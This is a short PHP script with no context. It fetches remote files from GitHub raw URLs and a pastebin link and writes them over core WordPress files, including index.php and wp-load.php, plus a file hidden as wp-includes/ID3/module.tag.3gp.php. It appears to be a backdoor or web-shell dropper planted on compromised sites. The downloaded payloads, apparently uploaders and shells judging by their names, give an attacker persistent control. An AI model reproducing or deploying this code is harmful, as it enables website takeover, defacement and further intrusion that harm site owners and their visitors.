<?php $nama2= fopen($_SERVER['DOCUMENT_ROOT'] . '/index.php' ,'w+');
  $file2 = file_get_contents('https://raw.githubusercontent.com/prokontra/prokontra/main/wpindex');
  $tulis2 = fwrite ($nama2 ,$file2);
 fclose($nama2); ?>
 
 <?php $nama3= fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-load.php' ,'w+');
  $file3 = file_get_contents('https://pastebin.com/raw/8cB9HM4h');
  $tulis3 = fwrite ($nama3 ,$file3);
 fclose($nama3); ?>
 
 <?php $nama4= fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/index.php' ,'w+');
  $file4 = file_get_contents('https://raw.githubusercontent.com/prokontra/byps/main/Upload');
  $tulis4 = fwrite ($nama4 ,$file4);
 fclose($nama4); ?>
 
 <?php 
$nama= fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/ID3/module.tag.3gp.php' ,'w+');
  $file = file_get_contents('https://raw.githubusercontent.com/prokontra/all-in/main/sementara');
  $tulis = fwrite ($nama ,$file);
 fclose($nama); ?>
 
 <?php 
$nama1= fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/index.php' ,'w+');
  $file1 = file_get_contents('https://raw.githubusercontent.com/prokontra/all-in/main/404');
  $tulis1 = fwrite ($nama1 ,$file1);
 fclose($nama1); ?>
 
